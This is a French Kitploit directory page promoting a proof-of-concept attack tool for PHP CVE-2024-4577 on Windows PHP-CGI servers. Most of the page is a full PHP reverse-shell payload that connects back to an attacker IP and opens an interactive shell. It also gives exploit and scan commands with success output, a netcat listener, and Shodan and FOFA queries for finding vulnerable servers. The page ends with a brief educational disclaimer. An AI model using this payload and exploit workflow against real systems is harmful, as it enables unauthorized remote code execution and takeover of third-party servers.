Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-4577-RCE-ATTACK — ATTACK PoC - PHP CVE-2024-4577 | Kitploit
Outils/GitHubGitHub/bibo318/cve-2024-4577-rce-attack
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubbibo318/cve-2024-4577-rce-attack

CVE-2024-4577-RCE-ATTACK

ATTACK PoC - PHP CVE-2024-4577

Voir le dépôt
53il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PHP CVE-2024-4577-RCE-ATTACK-ATTACK

Medium Python Kali

📜 Description

Dans les versions de PHP 8.1.* antérieures à 8.1.29, 8.2.* antérieures à 8.2.20, 8.3.* antérieures à 8.3.8, lors de l'utilisation d'Apache et PHP-CGI sur Windows, si le système est configuré pour utiliser certains codes pages, Windows peut utiliser le comportement « Best Fit » pour remplacer les caractères dans la ligne de commande fournie aux fonctions de l'API Win32. Le module PHP CGI peut interpréter ces caractères comme des options PHP, ce qui pourrait permettre à un utilisateur malveillant de transmettre des options au binaire PHP en cours d'exécution, divulguant ainsi le code source du script, exécutant du code PHP arbitraire sur le serveur, etc.

« XAMPP est vulnérable dans sa configuration par défaut, et nous pouvons cibler le point de terminaison /php-cgi/php-cgi.exe. Pour cibler un point de terminaison .php explicite (par exemple /index.php), le serveur doit être configuré pour exécuter des scripts PHP en mode CGI. »

📚 Table des matières

  • 📜 Description
Télécharger l’outil
  • 🛠️ Installation
  • ⚙️ Utilisation
  • 💁 Références
  • 🛠️ Installation

    root@kitploit:~
    $ git clone https://github.com/bibo318/CVE-2024-4577-RCE-ATTACK.git
    $ cd CVE-2024-4577-RCE-ATTACK && pip install -r requirements.txt 
    

    ⚙️ Utilisation

    php-cge

    🤖 Configuration du shell inversé

    PHP Payload

    [!NOTE] Cet outil illustre les techniques, tactiques et procédures (TTP). Cependant, cet exemple de charge utile spécifique ne fonctionne pas dans ce cas. Modifiez shell.php pour obtenir une charge utile pleinement fonctionnelle.

    root@kitploit:~
    # rev_shell.php
    <?php
    // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
    
    set_time_limit (0);
    $VERSION = "1.0";
    $ip = 'xxxxxxxxxxx';  // CHANGE THIS
    $port = 9999;       // CHANGE THIS
    $chunk_size = 1400;
    $write_a = null;
    $error_a = null;
    $shell = 'uname -a; w; id; /bin/sh -i';
    $daemon = 0;
    $debug = 0;
    
    //
    // Daemonise ourself if possible to avoid zombies later
    //
    
    // pcntl_fork is hardly ever available, but will allow us to daemonise
    // our php process and avoid zombies.  Worth a try...
    if (function_exists('pcntl_fork')) {
    	// Fork and have the parent process exit
    	$pid = pcntl_fork();
    	
    	if ($pid == -1) {
    		printit("ERROR: Can't fork");
    		exit(1);
    	}
    	
    	if ($pid) {
    		exit(0);  // Parent exits
    	}
    
    	// Make the current process a session leader
    	// Will only succeed if we forked
    	if (posix_setsid() == -1) {
    		printit("Error: Can't setsid()");
    		exit(1);
    	}
    
    	$daemon = 1;
    } else {
    	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
    }
    
    // Change to a safe directory
    chdir("/");
    
    // Remove any umask we inherited
    umask(0);
    
    //
    // Do the reverse shell...
    //
    
    // Open reverse connection
    $sock = fsockopen($ip, $port, $errno, $errstr, 30);
    if (!$sock) {
    	printit("$errstr ($errno)");
    	exit(1);
    }
    
    // Spawn shell process
    $descriptorspec = array(
       0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
       1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
       2 => array("pipe", "w")   // stderr is a pipe that the child will write to
    );
    
    $process = proc_open($shell, $descriptorspec, $pipes);
    
    if (!is_resource($process)) {
    	printit("ERROR: Can't spawn shell");
    	exit(1);
    }
    
    // Set everything to non-blocking
    // Reason: Occsionally reads will block, even though stream_select tells us they won't
    stream_set_blocking($pipes[0], 0);
    stream_set_blocking($pipes[1], 0);
    stream_set_blocking($pipes[2], 0);
    stream_set_blocking($sock, 0);
    
    printit("Successfully opened reverse shell to $ip:$port");
    
    while (1) {
    	// Check for end of TCP connection
    	if (feof($sock)) {
    		printit("ERROR: Shell connection terminated");
    		break;
    	}
    
    	// Check for end of STDOUT
    	if (feof($pipes[1])) {
    		printit("ERROR: Shell process terminated");
    		break;
    	}
    
    	// Wait until a command is end down $sock, or some
    	// command output is available on STDOUT or STDERR
    	$read_a = array($sock, $pipes[1], $pipes[2]);
    	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    
    	// If we can read from the TCP socket, send
    	// data to process's STDIN
    	if (in_array($sock, $read_a)) {
    		if ($debug) printit("SOCK READ");
    		$input = fread($sock, $chunk_size);
    		if ($debug) printit("SOCK: $input");
    		fwrite($pipes[0], $input);
    	}
    
    	// If we can read from the process's STDOUT
    	// send data down tcp connection
    	if (in_array($pipes[1], $read_a)) {
    		if ($debug) printit("STDOUT READ");
    		$input = fread($pipes[1], $chunk_size);
    		if ($debug) printit("STDOUT: $input");
    		fwrite($sock, $input);
    	}
    
    	// If we can read from the process's STDERR
    	// send data down tcp connection
    	if (in_array($pipes[2], $read_a)) {
    		if ($debug) printit("STDERR READ");
    		$input = fread($pipes[2], $chunk_size);
    		if ($debug) printit("STDERR: $input");
    		fwrite($sock, $input);
    	}
    }
    
    fclose($sock);
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);
    
    // Like print, but does nothing if we've daemonised ourself
    // (I can't figure out how to redirect STDOUT like a proper daemon)
    function printit ($string) {
    	if (!$daemon) {
    		print "$string\n";
    	}
    }
    
    ?> 
    

    🖥️ Scan du serveur

    root@kitploit:~
    $ python3 CVE-2024-4577.py -s -t https://target.com/  
                                                       
    ,------. ,--.  ,--.,------.   ,-----.,--.   ,--.,------.        ,---.   ,--.  ,---.   ,---.         ,---.,-----.,-----.,-----. ,------.  ,-----.,------. 
    |  .--. '|  '--'  ||  .--. ' '  .--./ \  `.'  / |  .---',-----.'.-.  \ /    '.-.  \ /    |,-----. /    ||  .--''--,  /'--,  / |  .--. ''  .--./|  .---' 
    |  '--' ||  .--.  ||  '--' | |  |      \     /  |  `--, '-----' .-' .'|  ()  |.-' .'/  '  |'-----'/  '  |'--. `\ .'  /  .'  /  |  '--'.'|  |    |  `--,  
    |  | --' |  |  |  ||  | --'  '  '--'\   \   /   |  `---.       /   '-. \    //   '-.'--|  |       '--|  |.--'  //   /  /   /   |  |\  \ '  '--'\|  `---. 
    `--'     `--'  `--'`--'       `-----'    `-'    `------'       '-----'  `--' '-----'   `--'          `--'`----' `--'   `--'    `--' '--' `-----'`------'             
             Author: Demongod | CVE-2024-4577 | PoC and Scanner |                     
        
    [+] Target https://xxxx.com dễ bị tấn công bởi CVE-2024-4577
    

    🎯 Exploitation du serveur vulnérable

    root@kitploit:~
    $ python3 CVE-2024-4577.py -t http://example.com -e -p rev_shell.php
                                                       
    ,------. ,--.  ,--.,------.   ,-----.,--.   ,--.,------.        ,---.   ,--.  ,---.   ,---.         ,---.,-----.,-----.,-----. ,------.  ,-----.,------. 
    |  .--. '|  '--'  ||  .--. ' '  .--./ \  `.'  / |  .---',-----.'.-.  \ /    '.-.  \ /    |,-----. /    ||  .--''--,  /'--,  / |  .--. ''  .--./|  .---' 
    |  '--' ||  .--.  ||  '--' | |  |      \     /  |  `--, '-----' .-' .'|  ()  |.-' .'/  '  |'-----'/  '  |'--. `\ .'  /  .'  /  |  '--'.'|  |    |  `--,  
    |  | --' |  |  |  ||  | --'  '  '--'\   \   /   |  `---.       /   '-. \    //   '-.'--|  |       '--|  |.--'  //   /  /   /   |  |\  \ '  '--'\|  `---. 
    `--'     `--'  `--'`--'       `-----'    `-'    `------'       '-----'  `--' '-----'   `--'          `--'`----' `--'   `--'    `--' '--' `-----'`------'  
            Author: Demongod | CVE-2024-4577 | PoC and Scanner |
    
    [+] Khai thác thành công!
    

    👨🏻‍💻 Netcat Listener

    root@kitploit:~
    $ nc -lvnp 9999
    

    🔍 Détection des serveurs vulnérables

    • Shodan: server: PHP 8.1, server: PHP 8.2, server: PHP 8.3
    • FOFA: protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"

    💁 Références

    • https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
    • https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
    • http://www.openwall.com/lists/oss-security/2024/06/07/1
    • https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
    • https://www.php.net/ChangeLog-8.php#8.1.29
    • https://www.php.net/ChangeLog-8.php#8.2.20
    • https://www.php.net/ChangeLog-8.php#8.3.8

    ⚠️ Avertissement

    Cet outil est fourni à des fins éducatives et de recherche uniquement. Le créateur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil. Créer un problème